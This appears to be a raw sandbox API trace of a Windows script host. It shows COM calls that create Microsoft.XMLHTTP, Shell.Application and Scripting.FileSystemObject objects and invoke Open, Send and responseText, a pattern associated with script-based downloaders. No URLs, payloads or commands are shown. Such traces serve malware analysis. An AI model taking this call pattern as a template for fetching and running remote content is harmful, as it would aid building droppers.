	[0297.688] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0297.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0298.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0298.994] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0298.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0298.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0298.994] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0298.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0298.994] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0298.994] SysStringLen (param_1=0x0) returned 0x0
	[0298.994] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0298.995] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0298.995] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0298.995] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0298.995] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0298.995] ??2@YAPEAX_K@Z () returned 0x62f350
	[0298.995] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0298.995] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0298.995] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0298.995] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0298.995] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0298.995] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0298.995] SysStringLen (param_1=0x0) returned 0x0
	[0298.995] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0298.998] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0298.998] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0298.998] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0298.998] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0298.998] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0298.999] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0300.332] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0300.332] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0300.332] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0300.333] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0300.333] SysStringLen (param_1=0x0) returned 0x0
	[0300.333] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0300.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0300.334] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0300.334] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0300.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0300.334] ??2@YAPEAX_K@Z () returned 0x62f330
	[0300.334] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f330) 
	[0300.334] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0300.334] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0300.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0300.334] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0300.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0300.334] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0300.337] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0300.337] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0300.337] SysStringLen (param_1=0x0) returned 0x0
	[0300.337] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0300.337] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0300.337] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0300.337] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0300.337] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0300.337] ??2@YAPEAX_K@Z () returned 0x62f310
	[0300.338] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0300.338] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0300.338] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0300.338] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0300.338] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0300.338] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0300.338] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0300.338] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0300.338] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0300.338] SysStringLen (param_1=0x0) returned 0x0
	[0300.338] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0300.338] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0300.338] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0300.338] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0300.338] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0300.339] ??2@YAPEAX_K@Z () returned 0x62f330
	[0300.339] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f330) 
	[0300.339] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0300.339] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0300.339] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0300.339] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0300.339] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0300.339] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0300.339] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0300.339] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0300.339] SysStringLen (param_1=0x0) returned 0x0
	[0300.339] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0300.339] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0300.339] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0300.339] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0300.339] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0300.339] ??2@YAPEAX_K@Z () returned 0x62f310
	[0300.339] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0300.340] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0300.340] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0300.340] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0300.340] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0300.340] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0300.340] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0300.340] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0300.340] longjmp () 
	[0300.340] longjmp () 
	[0300.340] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0300.340] SysStringLen (param_1=0x0) returned 0x0
